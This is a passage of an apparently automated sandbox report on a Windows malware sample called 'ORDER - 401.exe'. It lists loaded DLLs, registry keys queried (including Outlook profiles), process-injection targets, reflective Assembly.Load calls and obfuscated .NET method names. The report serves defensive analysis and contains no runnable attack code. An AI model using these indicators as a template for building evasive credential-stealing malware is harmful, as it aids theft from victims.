                Source: C:\Users\user\Desktop\ORDER - 401.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Section loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\ORDER - 401.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\ieUnatt.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: ORDER - 401.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: ORDER - 401.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: ieUnAtt.pdbGCTL source: ORDER - 401.exe, 00000005.00000002.2477292832.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, ORDER - 401.exe, 00000005.00000002.2477292832.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000002.4676619374.0000000000812000.00000004.00000020.00020000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000002.4676619374.0000000000831000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZaZCnGdXtY.exe, 00000007.00000002.4676883405.0000000000CAE000.00000002.00000001.01000000.0000000C.sdmp, ZaZCnGdXtY.exe, 0000000A.00000002.4676537211.0000000000CAE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: ieUnAtt.pdb source: ORDER - 401.exe, 00000005.00000002.2477292832.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, ORDER - 401.exe, 00000005.00000002.2477292832.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000002.4676619374.0000000000812000.00000004.00000020.00020000.00000000.sdmp, ZaZCnGdXtY.exe, 00000007.00000002.4676619374.0000000000831000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: ORDER - 401.exe, 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2477340893.0000000003F4F000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2479593417.00000000040F4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ORDER - 401.exe, ORDER - 401.exe, 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, ieUnatt.exe, 00000008.00000002.4677342991.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4677342991.000000000443E000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2477340893.0000000003F4F000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2479593417.00000000040F4000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, HsSXbpVbC9Doqnq3or.cs | .Net Code: TWhPUwXM6H System.Reflection.Assembly.Load(byte[])
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, HsSXbpVbC9Doqnq3or.cs | .Net Code: TWhPUwXM6H System.Reflection.Assembly.Load(byte[])
                Source: 0.2.ORDER - 401.exe.6ff0000.3.raw.unpack, L2.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_04B6A5F3 push es; ret 0_2_04B6A5FA
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_04B6A5EF push es; ret 0_2_04B6A5F2
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_04B6A681 push es; ret 0_2_04B6A682
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_04B6A6DB push es; ret 0_2_04B6A6E2
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_04B6A6D9 push es; ret 0_2_04B6A6DA
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_04B6E1EF push ss; ret 0_2_04B6E1F2
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_04B6E1EB push ss; ret 0_2_04B6E1EE
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_04B6EAD8 push ds; ret 0_2_04B6EADA
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_04B6EA40 push ds; ret 0_2_04B6EA42
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_04B6EBF7 push ds; ret 0_2_04B6EBFA
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_04B6EBF3 push ds; ret 0_2_04B6EBF6
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_04B6EBEF push ds; ret 0_2_04B6EBF2
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_04B614D8 push edx; retf 0_2_04B614FF
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_04B6D551 push cs; ret 0_2_04B6D552
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 0_2_04B6D548 push cs; ret 0_2_04B6D54A
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0040D8D0 pushad ; iretd 5_2_0040D8D1
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_004031B0 push eax; ret 5_2_004031B2
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0040D3DE pushad ; retf 5_2_0040D3DF
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_00414C77 push es; iretd 5_2_00414C79
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_00415DE9 push ebp; iretd 5_2_00415E4B
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_0040E61C push es; retf 5_2_0040E61D
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_00418699 push esp; iretd 5_2_0041869A
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_00405F99 push edi; retf 5_2_00405F9A
                Source: C:\Users\user\Desktop\ORDER - 401.exe | Code function: 5_2_010109AD push ecx; mov dword ptr [esp], ecx 5_2_010109B6
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe | Code function: 7_2_027CA21E push edi; retf 7_2_027CA21F
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe | Code function: 7_2_027D1B55 pushad ; iretd 7_2_027D1B56
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe | Code function: 7_2_027DA06E push ebp; iretd 7_2_027DA0D0
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe | Code function: 7_2_027D28A1 push es; retf 7_2_027D28A2
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe | Code function: 7_2_027DC91E push esp; iretd 7_2_027DC91F
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe | Code function: 7_2_027D1663 pushad ; retf 7_2_027D1664
                Source: C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe | Code function: 7_2_027D8EFC push es; iretd 7_2_027D8EFE
                Source: ORDER - 401.exe | Static PE information: section name: .text entropy: 7.7236492887754595
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, uLpBcQ1iE6j6nspAqO.cs | High entropy of concatenated method names: 'ToString', 'KJFOLsw1tV', 'Xb1OFTR8Jk', 'h41OyyyKc4', 'YC6OhaD3l4', 'L1lOssyTtI', 'McRON17P6p', 'g7GOTIO19b', 'CsBOHd54lL', 'GuiOpdAHsv'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, Q1n6m6PWnBd6Yj0vIv.cs | High entropy of concatenated method names: 'DAF80tyuSp', 'QLs8V9Z4EJ', 'Lbk8j0ObJQ', 'OFl8ZvM065', 'vJ28AXUAVf', 'l2Z8Or9bvd', 'lfHCQnUAs2G2vLDB5I', 'QjeqN3EblSM7ndB10N', 'gvj88D0jtA', 'VMu8Q7fE6i'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, TAEGUkSayFYRJToS90.cs | High entropy of concatenated method names: 'uRlBqsG464', 'QfsBlEZO7d', 'toNBrxcDf9', 'b48B0V02D1', 'qJnBKwf2pq', 'h6DBV5BLFa', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, QgQX3i8kjHvSZE1DcqJ.cs | High entropy of concatenated method names: 'ToString', 'eLI6R4iD0V', 'gL569bbCv0', 'Q1Y6DnWNof', 'CKM6EeNfIV', 'lFO6FaKxLQ', 'AaY6y1HfW1', 'sGa6hmuaxX', 'oT41ShszqJRUnaW4cAV', 'Fful6vmZq74aRHFS930'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, HtyuSpR3Ls9Z4EJjgG.cs | High entropy of concatenated method names: 'aPT54cENqs', 'RYG5aAYY0n', 'snH51neq5x', 'ygZ5w02LEG', 'KB35t52uHQ', 'M6Y5d0I0ht', 'i0W5oPfu91', 'w265MftX1J', 'Jr15vVabXE', 'zxW5SoqIFY'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, pLWf4nvp9MSF2Z2pHI.cs | High entropy of concatenated method names: 'CSyKEO4IK6', 'huKKFqiQwS', 'YaMKykDuSj', 'XdtKhBgloV', 'mlxKsvqNCx', 'i1aKNG1UdG', 'hwmKTWfvKY', 'OIbKHoPWi8', 'NjCKpE0w6l', 'jToKYw1gQ3'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, Ep2iAM3HXQ8bsvYHCK.cs | High entropy of concatenated method names: 'OuJXRT3ehe', 'mg5X9ZmGuC', 'fE9XElyYbg', 'PFyXFdA6CW', 'v4jXh31Qw7', 'EoZXsSSnCa', 'M7uXTamGFM', 'KupXH3fMLE', 'vsTXYvKqp5', 'RxMXLP1ZCN'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, oVfW2ZEr9bvdHF9Opp.cs | High entropy of concatenated method names: 'AFErJuagvX', 'QmRr5qJZmR', 'uaFrlvSvkJ', 'M3Lr0jLNjp', 'ODTrV6HlE0', 'Bf6ltEHfvR', 'bNAldZH0lK', 'JPOloAstO8', 'QcllMAmcb0', 'y2NlvK9WbU'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, HsSXbpVbC9Doqnq3or.cs | High entropy of concatenated method names: 'luSQJ5lIDi', 'FAXQnxhu5n', 'sYlQ5ddumu', 'bP2QqCCvvp', 'v9LQlK7l57', 'ROcQrbXHFV', 'SSvQ0JwmO0', 'J3KQVB92Qv', 'CMAQWlXWjg', 'jUpQjJ7dsn'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, z2DpoidV02NHKIJE69.cs | High entropy of concatenated method names: 'j3Z2MInOmE', 'Mko2SU2cOC', 'osVi7buYKE', 'mhBi8hf2hZ', 'S3D2Lk1xVb', 'e3H2uYkrVA', 'OU823nPkGD', 'xr024x5ayK', 'vyP2aI8P4E', 'jtO21feDtu'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, iBUyGGoCP8m6q3fmVM.cs | High entropy of concatenated method names: 'rcJKAOK3Ep', 'jJjK2Ig3WQ', 'd1qKKyWv2v', 'uKYK6K1xPT', 'A0FKGZe2jL', 'GkmKm51jc6', 'Dispose', 'qm3innJ2vm', 'Ddvi5LkHSh', 'jBgiqm0AvI'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, wW4nPF5h3062hYG1RF.cs | High entropy of concatenated method names: 'Dispose', 'am68vq3fmV', 'MA8kF9TEtm', 'JJnUS6qlsS', 'X1d8SSASS4', 'ODe8zmIm0j', 'ProcessDialogKey', 'e4Ok7LWf4n', 'N9Mk8SF2Z2', 'MHIkkwAEGU'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, W065flD2hm3EUGJ2XU.cs | High entropy of concatenated method names: 'tDGlCcDFHk', 'DK1lfnTx37', 'QsWqydMwfx', 'uhgqhrsH51', 'iDaqsTMXHa', 'xNFqNsaOiQ', 'lfrqTqjalN', 'Qw9qHjFPhp', 'Vdfqpl5qfa', 'N2WqYVaowO'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, a1LbuN884WokIU0msjE.cs | High entropy of concatenated method names: 'HueBSNUHqe', 'X34Bz86NRL', 'w1Y67XTy2y', 'EwX68KhcJJ', 'wpr6kmLKRu', 'tfL6QZVTmK', 'G2F6PFe0VI', 'ftu6JBsHvs', 'kpq6n7BHun', 'CTV652tkSx'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, M7CP3Bq5RQXQOXCQj4.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'hVWkvlknrY', 'FwikSlt6Gr', 'YPXkze4RHM', 'x8PQ71E2M5', 'MnZQ8uxmKj', 'srGQkucZyU', 'ha8QQqXATt', 'qy1Zdu2IOW4MFfpD9Vi'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, PxIeI487WEb3VwRmLS6.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mQWBLXRDA2', 'FxcBu2bhtA', 'aZgB3NlCZM', 'NpjB4pCceR', 'Ru0BaxtS1h', 'piqB18fh0W', 'y8wBwKV0sT'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, A38q5fk3M2oVsvwXH6.cs | High entropy of concatenated method names: 'nj5UD2uYn', 'wp5xaMDJG', 'iUTIoXuFi', 'OH4fMayWp', 'NsF9RdwhO', 'wuTDwSYe4', 'CfbiyteMY96ZisL5r8', 'r4qqWe7WmKhcbDLsJ8', 'cw5ikuXvT', 'DW7BE3BL0'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, YyYdhfTNhqxaIZeAv5.cs | High entropy of concatenated method names: 'vbb0naPHOr', 'P6j0qRkFHN', 'hOd0rl0pUG', 'BkZrSasy22', 'K0arz63DsL', 'BIC07ewrrN', 'NaZ08KikN5', 'SFA0kgrRK1', 'Ukl0QA2IGu', 'DfH0PSsDyV'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, IqS7gPwmshBc2txLDH.cs | High entropy of concatenated method names: 'Cjj2jreKLA', 'vqR2ZgGY0w', 'ToString', 'AS92niTNVc', 'Ppp253y9Yr', 'kDg2qlMrOV', 'qss2limssX', 'CWx2rVKEAc', 'di320a8AcI', 'jL52Vy50FI'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, InnIZO48UkSWft8aCD.cs | High entropy of concatenated method names: 'sCNAY9J3dm', 'KEpAu7i3jm', 'IXmA4iGYeL', 'Yg4AavlYAy', 'wgwAFOxyXw', 'pW1AyeXSi2', 'DKgAhPxdMU', 'VrPAsXwD7v', 'mg9ANU1FCb', 'uxKATf1bY6'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, uGrGY08PbqOF82LUnIn.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MbNeK1SScU', 'fAceBgwolG', 'VlXe6lWt2V', 'N1EeeOI4WH', 'Oa8eG6wChb', 'vvPebNNi8a', 'w0FemgyYDI'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, qww2aEpv3URbyYY9VD.cs | High entropy of concatenated method names: 'Mvc0cLvhMf', 'iH90gXWUrD', 'zop0U05fRR', 'AfI0xndMFO', 'RPY0COuDeX', 'vEM0IRk1RU', 'xY90fRKiUL', 'oea0REWqiC', 'QTF09brB7q', 'iQL0DtxrBR'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, tXMW2T9bk0ObJQYFlv.cs | High entropy of concatenated method names: 'bkPqxCcyq6', 'zePqI6mCH6', 'NsAqRXCaB5', 'vYUq9sYOfv', 'fANqAQZgHo', 'X1FqO4mVKk', 'qhsq2uiW5p', 'O5Fqi7OjLQ', 'DIsqK3Yg0E', 'uDtqBWhlkG'
                Source: 0.2.ORDER - 401.exe.7110000.4.raw.unpack, BwOqc3zQiesYrVLOFE.cs | High entropy of concatenated method names: 'YaKBICDnNv', 'ji0BRTkAuR', 'FTbB9j2FCb', 'gHsBEU8m2a', 'vhBBFBReaX', 'wTFBhU29Jj', 'rc0BsODaNU', 'ueCBm5JTKb', 'bYYBcSFu21', 'xV3BgkSvxf'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, uLpBcQ1iE6j6nspAqO.cs | High entropy of concatenated method names: 'ToString', 'KJFOLsw1tV', 'Xb1OFTR8Jk', 'h41OyyyKc4', 'YC6OhaD3l4', 'L1lOssyTtI', 'McRON17P6p', 'g7GOTIO19b', 'CsBOHd54lL', 'GuiOpdAHsv'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, Q1n6m6PWnBd6Yj0vIv.cs | High entropy of concatenated method names: 'DAF80tyuSp', 'QLs8V9Z4EJ', 'Lbk8j0ObJQ', 'OFl8ZvM065', 'vJ28AXUAVf', 'l2Z8Or9bvd', 'lfHCQnUAs2G2vLDB5I', 'QjeqN3EblSM7ndB10N', 'gvj88D0jtA', 'VMu8Q7fE6i'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, TAEGUkSayFYRJToS90.cs | High entropy of concatenated method names: 'uRlBqsG464', 'QfsBlEZO7d', 'toNBrxcDf9', 'b48B0V02D1', 'qJnBKwf2pq', 'h6DBV5BLFa', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, QgQX3i8kjHvSZE1DcqJ.cs | High entropy of concatenated method names: 'ToString', 'eLI6R4iD0V', 'gL569bbCv0', 'Q1Y6DnWNof', 'CKM6EeNfIV', 'lFO6FaKxLQ', 'AaY6y1HfW1', 'sGa6hmuaxX', 'oT41ShszqJRUnaW4cAV', 'Fful6vmZq74aRHFS930'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, HtyuSpR3Ls9Z4EJjgG.cs | High entropy of concatenated method names: 'aPT54cENqs', 'RYG5aAYY0n', 'snH51neq5x', 'ygZ5w02LEG', 'KB35t52uHQ', 'M6Y5d0I0ht', 'i0W5oPfu91', 'w265MftX1J', 'Jr15vVabXE', 'zxW5SoqIFY'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, pLWf4nvp9MSF2Z2pHI.cs | High entropy of concatenated method names: 'CSyKEO4IK6', 'huKKFqiQwS', 'YaMKykDuSj', 'XdtKhBgloV', 'mlxKsvqNCx', 'i1aKNG1UdG', 'hwmKTWfvKY', 'OIbKHoPWi8', 'NjCKpE0w6l', 'jToKYw1gQ3'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, Ep2iAM3HXQ8bsvYHCK.cs | High entropy of concatenated method names: 'OuJXRT3ehe', 'mg5X9ZmGuC', 'fE9XElyYbg', 'PFyXFdA6CW', 'v4jXh31Qw7', 'EoZXsSSnCa', 'M7uXTamGFM', 'KupXH3fMLE', 'vsTXYvKqp5', 'RxMXLP1ZCN'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, oVfW2ZEr9bvdHF9Opp.cs | High entropy of concatenated method names: 'AFErJuagvX', 'QmRr5qJZmR', 'uaFrlvSvkJ', 'M3Lr0jLNjp', 'ODTrV6HlE0', 'Bf6ltEHfvR', 'bNAldZH0lK', 'JPOloAstO8', 'QcllMAmcb0', 'y2NlvK9WbU'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, HsSXbpVbC9Doqnq3or.cs | High entropy of concatenated method names: 'luSQJ5lIDi', 'FAXQnxhu5n', 'sYlQ5ddumu', 'bP2QqCCvvp', 'v9LQlK7l57', 'ROcQrbXHFV', 'SSvQ0JwmO0', 'J3KQVB92Qv', 'CMAQWlXWjg', 'jUpQjJ7dsn'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, z2DpoidV02NHKIJE69.cs | High entropy of concatenated method names: 'j3Z2MInOmE', 'Mko2SU2cOC', 'osVi7buYKE', 'mhBi8hf2hZ', 'S3D2Lk1xVb', 'e3H2uYkrVA', 'OU823nPkGD', 'xr024x5ayK', 'vyP2aI8P4E', 'jtO21feDtu'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, iBUyGGoCP8m6q3fmVM.cs | High entropy of concatenated method names: 'rcJKAOK3Ep', 'jJjK2Ig3WQ', 'd1qKKyWv2v', 'uKYK6K1xPT', 'A0FKGZe2jL', 'GkmKm51jc6', 'Dispose', 'qm3innJ2vm', 'Ddvi5LkHSh', 'jBgiqm0AvI'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, wW4nPF5h3062hYG1RF.cs | High entropy of concatenated method names: 'Dispose', 'am68vq3fmV', 'MA8kF9TEtm', 'JJnUS6qlsS', 'X1d8SSASS4', 'ODe8zmIm0j', 'ProcessDialogKey', 'e4Ok7LWf4n', 'N9Mk8SF2Z2', 'MHIkkwAEGU'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, W065flD2hm3EUGJ2XU.cs | High entropy of concatenated method names: 'tDGlCcDFHk', 'DK1lfnTx37', 'QsWqydMwfx', 'uhgqhrsH51', 'iDaqsTMXHa', 'xNFqNsaOiQ', 'lfrqTqjalN', 'Qw9qHjFPhp', 'Vdfqpl5qfa', 'N2WqYVaowO'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, a1LbuN884WokIU0msjE.cs | High entropy of concatenated method names: 'HueBSNUHqe', 'X34Bz86NRL', 'w1Y67XTy2y', 'EwX68KhcJJ', 'wpr6kmLKRu', 'tfL6QZVTmK', 'G2F6PFe0VI', 'ftu6JBsHvs', 'kpq6n7BHun', 'CTV652tkSx'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, M7CP3Bq5RQXQOXCQj4.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'hVWkvlknrY', 'FwikSlt6Gr', 'YPXkze4RHM', 'x8PQ71E2M5', 'MnZQ8uxmKj', 'srGQkucZyU', 'ha8QQqXATt', 'qy1Zdu2IOW4MFfpD9Vi'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, PxIeI487WEb3VwRmLS6.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mQWBLXRDA2', 'FxcBu2bhtA', 'aZgB3NlCZM', 'NpjB4pCceR', 'Ru0BaxtS1h', 'piqB18fh0W', 'y8wBwKV0sT'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, A38q5fk3M2oVsvwXH6.cs | High entropy of concatenated method names: 'nj5UD2uYn', 'wp5xaMDJG', 'iUTIoXuFi', 'OH4fMayWp', 'NsF9RdwhO', 'wuTDwSYe4', 'CfbiyteMY96ZisL5r8', 'r4qqWe7WmKhcbDLsJ8', 'cw5ikuXvT', 'DW7BE3BL0'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, YyYdhfTNhqxaIZeAv5.cs | High entropy of concatenated method names: 'vbb0naPHOr', 'P6j0qRkFHN', 'hOd0rl0pUG', 'BkZrSasy22', 'K0arz63DsL', 'BIC07ewrrN', 'NaZ08KikN5', 'SFA0kgrRK1', 'Ukl0QA2IGu', 'DfH0PSsDyV'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, IqS7gPwmshBc2txLDH.cs | High entropy of concatenated method names: 'Cjj2jreKLA', 'vqR2ZgGY0w', 'ToString', 'AS92niTNVc', 'Ppp253y9Yr', 'kDg2qlMrOV', 'qss2limssX', 'CWx2rVKEAc', 'di320a8AcI', 'jL52Vy50FI'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, InnIZO48UkSWft8aCD.cs | High entropy of concatenated method names: 'sCNAY9J3dm', 'KEpAu7i3jm', 'IXmA4iGYeL', 'Yg4AavlYAy', 'wgwAFOxyXw', 'pW1AyeXSi2', 'DKgAhPxdMU', 'VrPAsXwD7v', 'mg9ANU1FCb', 'uxKATf1bY6'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, uGrGY08PbqOF82LUnIn.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MbNeK1SScU', 'fAceBgwolG', 'VlXe6lWt2V', 'N1EeeOI4WH', 'Oa8eG6wChb', 'vvPebNNi8a', 'w0FemgyYDI'
                Source: 0.2.ORDER - 401.exe.3626998.0.raw.unpack, qww2aEpv3URbyYY9VD.cs | High entropy of concatenated method names: 'Mvc0cLvhMf', 'iH90gXWUrD', 'zop0U05fRR', 'AfI0xndMFO', 'RPY0COuDeX', 'vEM0IRk1RU', 'xY90fRKiUL', 'oea0REWqiC', 'QTF09brB7q', 'iQL0DtxrBR'
